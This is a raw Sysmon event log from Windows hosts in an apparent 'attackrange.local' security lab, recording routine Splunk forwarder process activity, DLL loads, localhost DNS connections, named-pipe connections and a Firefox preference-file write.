Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219945Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.581{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBF-618E-1CCE-08000000F101}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219944Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.566{AD5E2759-5BBF-618E-1CCE-08000000F101}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219943Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.144{AD5E2759-54C7-6143-A600-00000000F101}4072NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000057350679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.453{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057350678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.453{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057350677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.453{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.453{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057350675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.400{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.400{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=548FD18B64C8325CE9270D315642DB8A,SHA256=2A1A495B3273BEBCE44844C86C21F68582A3A75CB2F8630DB9A0E322BDF41DFEfalsetrue 354300x800000000000000057350673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:41.440{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local58442- 354300x800000000000000057350672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:41.439{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54517- 734700x800000000000000057350671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057350667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 11241100x800000000000000057350665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\prefs-1.js2021-11-12 12:19:11.284 734700x800000000000000057350664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 23542300x800000000000000057350663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 734700x800000000000000057350662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 11241100x800000000000000057350661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\prefs-1.js2021-11-12 12:19:11.284 734700x800000000000000057350660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.284{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x800000000000000057350651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057350634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.268{8B6011A9-5BBF-618E-67F3-04000000F101}3780C:\Program 